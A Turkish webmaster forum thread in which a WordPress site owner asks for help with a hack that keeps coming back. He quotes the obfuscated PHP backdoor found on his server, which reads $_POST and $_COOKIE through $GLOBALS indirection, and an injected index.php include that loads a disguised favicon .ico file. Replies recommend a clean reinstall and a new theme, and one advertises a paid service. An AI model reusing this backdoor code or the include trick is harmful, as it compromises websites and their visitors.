lostyazilim
tr.link

Böyle bir sorunla karşı karşıyayım

6 Mesajlar 1.069 Okunma
acebozum
tr.link

omerkarasu97 omerkarasu97 WM Aracı Kullanıcı
  • Üyelik 15.02.2017
  • Yaş/Cinsiyet 27 / E
  • Meslek Öğrenci
  • Konum İstanbul Anadolu
  • Ad Soyad Ö** K**
  • Mesajlar 8
  • Beğeniler 0 / 1
  • Ticaret 0, (%0)
Merhaba arkadaşlar , son günlerde wp siteme çince indexler geliyordu bu indexler 1.sayfama kadar çıktı ve ftp de bazı yabancı dosyalar buldum bunları sildim 1 hafta sonra tekrar bu dosyaları ftpde buldum.Bu sorunu nasıl çözerim.Bedava bir tema kullanıyorum en büyük şüphem temadan olabileceği ftpdeki dosyaların içeriği şu şekilde :

$GLOBALS[$GLOBALS['t443480'][2].$GLOBALS['t443480'][82].$GLOBALS['t443480'][11].$GLOBALS['t443480'][90]] = $GLOBALS['t443480'][63].$GLOBALS['t443480'][88].$GLOBALS['t443480'][25];
$GLOBALS[$GLOBALS['t443480'][48].$GLOBALS['t443480'][5].$GLOBALS['t443480'][62].$GLOBALS['t443480'][40]] = $GLOBALS['t443480'][74].$GLOBALS['t443480'][25].$GLOBALS['t443480'][2];
$GLOBALS[$GLOBALS['t443480'][91].$GLOBALS['t443480'][84].$GLOBALS['t443480'][58].$GLOBALS['t443480'][63]] = $GLOBALS['t443480'][65].$GLOBALS['t443480'][31].$GLOBALS['t443480'][25].$GLOBALS['t443480'][70].$GLOBALS['t443480'][82].$GLOBALS['t443480'][26];
$GLOBALS[$GLOBALS['t443480'][58].$GLOBALS['t443480'][10].$GLOBALS['t443480'][58].$GLOBALS['t443480'][47].$GLOBALS['t443480'][58]] = $GLOBALS['t443480'][85].$GLOBALS['t443480'][26].$GLOBALS['t443480'][85].$GLOBALS['t443480'][20].$GLOBALS['t443480'][65].$GLOBALS['t443480'][82].$GLOBALS['t443480'][31];
$GLOBALS[$GLOBALS['t443480'][2].$GLOBALS['t443480'][63].$GLOBALS['t443480'][2].$GLOBALS['t443480'][84].$GLOBALS['t443480'][40].$GLOBALS['t443480'][90].$GLOBALS['t443480'][67].$GLOBALS['t443480'][82]] = $GLOBALS['t443480'][65].$GLOBALS['t443480'][82].$GLOBALS['t443480'][25].$GLOBALS['t443480'][85].$GLOBALS['t443480'][58].$GLOBALS['t443480'][70].$GLOBALS['t443480'][85].$GLOBALS['t443480'][71].$GLOBALS['t443480'][82];
$GLOBALS[$GLOBALS['t443480'][31].$GLOBALS['t443480'][10].$GLOBALS['t443480'][75].$GLOBALS['t443480'][75]] = $GLOBALS['t443480'][91].$GLOBALS['t443480'][88].$GLOBALS['t443480'][91].$GLOBALS['t443480'][53].$GLOBALS['t443480'][82].$GLOBALS['t443480'][25].$GLOBALS['t443480'][65].$GLOBALS['t443480'][85].$GLOBALS['t443480'][74].$GLOBALS['t443480'][26];
$GLOBALS[$GLOBALS['t443480'][71].$GLOBALS['t443480'][84].$GLOBALS['t443480'][11].$GLOBALS['t443480'][82].$GLOBALS['t443480'][90].$GLOBALS['t443480'][47].$GLOBALS['t443480'][7].$GLOBALS['t443480'][40].$GLOBALS['t443480'][40]] = $GLOBALS['t443480'][86].$GLOBALS['t443480'][26].$GLOBALS['t443480'][65].$GLOBALS['t443480'][82].$GLOBALS['t443480'][25].$GLOBALS['t443480'][85].$GLOBALS['t443480'][58].$GLOBALS['t443480'][70].$GLOBALS['t443480'][85].$GLOBALS['t443480'][71].$GLOBALS['t443480'][82];
$GLOBALS[$GLOBALS['t443480'][74].$GLOBALS['t443480'][11].$GLOBALS['t443480'][5].$GLOBALS['t443480'][40]] = $GLOBALS['t443480'][7].$GLOBALS['t443480'][58].$GLOBALS['t443480'][65].$GLOBALS['t443480'][82].$GLOBALS['t443480'][5].$GLOBALS['t443480'][84].$GLOBALS['t443480'][20].$GLOBALS['t443480'][2].$GLOBALS['t443480'][82].$GLOBALS['t443480'][63].$GLOBALS['t443480'][74].$GLOBALS['t443480'][2].$GLOBALS['t443480'][82];
$GLOBALS[$GLOBALS['t443480'][58].$GLOBALS['t443480'][90].$GLOBALS['t443480'][2].$GLOBALS['t443480'][5].$GLOBALS['t443480'][58].$GLOBALS['t443480'][11]] = $GLOBALS['t443480'][65].$GLOBALS['t443480'][82].$GLOBALS['t443480'][31].$GLOBALS['t443480'][20].$GLOBALS['t443480'][31].$GLOBALS['t443480'][85].$GLOBALS['t443480'][52].$GLOBALS['t443480'][82].$GLOBALS['t443480'][20].$GLOBALS['t443480'][70].$GLOBALS['t443480'][85].$GLOBALS['t443480'][52].$GLOBALS['t443480'][85].$GLOBALS['t443480'][31];
$GLOBALS[$GLOBALS['t443480'][45].$GLOBALS['t443480'][11].$GLOBALS['t443480'][10].$GLOBALS['t443480'][62]] = $GLOBALS['t443480'][91].$GLOBALS['t443480'][58].$GLOBALS['t443480'][5].$GLOBALS['t443480'][82].$GLOBALS['t443480'][62].$GLOBALS['t443480'][82].$GLOBALS['t443480'][63].$GLOBALS['t443480'][82].$GLOBALS['t443480'][7];
$GLOBALS[$GLOBALS['t443480'][25].$GLOBALS['t443480'][82].$GLOBALS['t443480'][10].$GLOBALS['t443480'][14].$GLOBALS['t443480'][90].$GLOBALS['t443480'][10]] = $GLOBALS['t443480'][7].$GLOBALS['t443480'][14].$GLOBALS['t443480'][2].$GLOBALS['t443480'][11].$GLOBALS['t443480'][58].$GLOBALS['t443480'][40].$GLOBALS['t443480'][47].$GLOBALS['t443480'][84];
$GLOBALS[$GLOBALS['t443480'][25].$GLOBALS['t443480'][40].$GLOBALS['t443480'][82].$GLOBALS['t443480'][75].$GLOBALS['t443480'][67].$GLOBALS['t443480'][11].$GLOBALS['t443480'][47].$GLOBALS['t443480'][2]] = $_POST;
$GLOBALS[$GLOBALS['t443480'][63].$GLOBALS['t443480'][2].$GLOBALS['t443480'][5].$GLOBALS['t443480'][63].$GLOBALS['t443480'][5].$GLOBALS['t443480'][47].$GLOBALS['t443480'][40]] = $_COOKIE;
@$GLOBALS[$GLOBALS['t443480'][58].$GLOBALS['t443480'][10].$GLOBALS['t443480'][58].$GLOBALS['t443480'][47].$GLOBALS['t443480'][58]]($GLOBALS['t443480'][82].$GLOBALS['t443480'][25].$GLOBALS['t443480'][25].$GLOBALS['t443480'][74].$GLOBALS['t443480'][25].$GLOBALS['t443480'][20].$GLOBALS['t443480'][70].$GLOBALS['t443480'][74].$GLOBALS['t443480'][48], NULL);

@$GLOBALS[$GLOBALS['t443480'][58].$GLOBALS['t443480'][10].$GLOBALS['t443480'][58].$GLOBALS['t443480'][47].$GLOBALS['t443480'][58]]($GLOBALS['t443480'][70].$GLOBALS['t443480'][74].$GLOBALS['t443480'][48].$GLOBALS['t443480'][20].$GLOBALS['t443480'][82].$GLOBALS['t443480'][25].$GLOBALS['t443480'][25].$GLOBALS['t443480'][74].$GLOBALS['t443480'][25].$GLOBALS['t443480'][65], 0);

@$GLOBALS[$GLOBALS['t443480'][58].$GLOBALS['t443480'][10].$GLOBALS['t443480'][58].$GLOBALS['t443480'][47].$GLOBALS['t443480'][58]]($GLOBALS['t443480'][52].$GLOBALS['t443480'][58].$GLOBALS['t443480'][87].$GLOBALS['t443480'][20].$GLOBALS['t443480'][82].$GLOBALS['t443480'][87].$GLOBALS['t443480'][82].$GLOBALS['t443480'][63].$GLOBALS['t443480'][86].$GLOBALS['t443480'][31].$GLOBALS['t443480'][85].$GLOBALS['t443480'][74].$GLOBALS['t443480'][26].$GLOBALS['t443480'][20].$GLOBALS['t443480'][31].$GLOBALS['t443480'][85].$GLOBALS['t443480'][52].$GLOBALS['t443480'][82], 0);

@$GLOBALS[$GLOBALS['t443480'][58].$GLOBALS['t443480'][90].$GLOBALS['t443480'][2].$GLOBALS['t443480'][5].$GLOBALS['t443480'][58].$GLOBALS['t443480'][11]](0);



$h1466 = NULL;

$w6f3d5235 = NULL;


Bu da index.php içeriği


/*01e96*/

@include "\x2fho\x6de/\x6din\x69cl\x69pv\x67/p\x75bl\x69c_\x68tm\x6c/h\x75se\x79in\x63ic\x65k/\x77p-\x61dm\x69n/\x75se\x72/f\x61vi\x63on\x5f7c\x3883\x35.i\x63o";

/*01e96*/
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );



Bu sorunun çözümünü bilen varmı neden kaynaklı olabilir 1 aydan daha fazla süredir kurtaramadım.Wordpress en güncelde
NettaCompany

kişi bu mesajı beğendi.

wmaraci
reklam

Glaus Glaus Kimlik Onayı Bekliyor Banlı Kullanıcı
  • Üyelik 06.03.2017
  • Yaş/Cinsiyet 33 / E
  • Meslek ...
  • Konum İstanbul Avrupa
  • Ad Soyad Ü** D**
  • Mesajlar 238
  • Beğeniler 54 / 83
  • Ticaret 5, (%100)
Sitenizde ki bütün değişkenlere dahi erişimleri var. Kodlama da güvenlik zafiyetine neden olmamak için kullanılmaması gereken herşey kullanılmış. Dosya yükleme, sistem bilgileri, ziyaretçiler hakkında detaylı bilgi almaya, oturum açma, çerez okuma gibi bir çok veriyi zaten kendileriyle paylaşıyorsunuz.

Sisteminizi temizleyip temanızı değiştirin. Bu kadar kötü bir tema indirilebilirmiş hocam arşivleyip hatıra olarak saklasanız yeridir.
 

 

NettaCompany NettaCompany WM Aracı Kullanıcı
  • Üyelik 21.08.2016
  • Yaş/Cinsiyet 43 / E
  • Meslek İnternet Hizmetleri
  • Konum Diğer
  • Ad Soyad Z** A**
  • Mesajlar 533
  • Beğeniler 230 / 197
  • Ticaret 26, (%100)
omerkarasu97

https://www.nettacompany.com.tr/wordpress-optimizasyon

WP-Güvenlik paketi ile işlem kalıcı olarak çözülebilir.

Saygılarımızla.
 

 

NETTA WEB SOLUTIONS LTD Company Number 15911828 +447400493366

Dreameagles Dreameagles Hacking And Coder ♥ Kullanıcı
  • Üyelik 30.01.2016
  • Yaş/Cinsiyet 28 / E
  • Meslek ÖĞRENCİ
  • Konum Antalya
  • Ad Soyad F** B**
  • Mesajlar 281
  • Beğeniler 38 / 67
  • Ticaret 13, (%100)
Shell atılmış gibi duruyor. Temanızı değiştirmenizi tavsiye ederim. Ayrıca buradaki arkadaşlardan da yardım alabilirsiniz.
 

 

wmaraci
wmaraci

bage bage WM Aracı Kullanıcı
  • Üyelik 20.12.2017
  • Yaş/Cinsiyet 49 / E
  • Meslek Serbest
  • Konum İstanbul Avrupa
  • Ad Soyad B** G**
  • Mesajlar 13
  • Beğeniler 11 / 4
  • Ticaret 1, (%100)
Tüm Dünya'da wordpress sitelerine büyük saldırı var. Admin giriş adresinizi değiştirin. Bunun için bir eklenti vardı. Aklıma gelmedi şu an. Hosting şirketleri bu dertle uğraşıyorlar. Sanırım cpanel den bir açık var. Oradan sızıyorlar.

En iyisi ilgili ve deneyimli hosting sağlayıcıları çalışmak.
 

 

cihaneken cihaneken Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 25.07.2014
  • Yaş/Cinsiyet 30 / E
  • Meslek Elektrik Teknisyeni
  • Konum Fransa
  • Ad Soyad C** E**
  • Mesajlar 3508
  • Beğeniler 488 / 1190
  • Ticaret 1, (%100)
en basit şekilde; veri tabanı ve uploads klasörünün yedeğini al, daha sonra dosya yöneticisinden tüm dosyaları sil ardından tr.wordpress.org dan yeni wordpress indir yeni dosyaları tekrar yükle, uploads klasörünü bilgisayarında kontrol et içerisinde resim dosyası haricinde hiç bir dosya bulunmasın daha sonra o klasörüde gerekli yere tekrar yükle.
güvenli olmayan yerlerden tema ve eklenti yükleme kesinlikle. ayrıca veritabanı ve wordpress şifrelerini güncelle.
 

 

Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al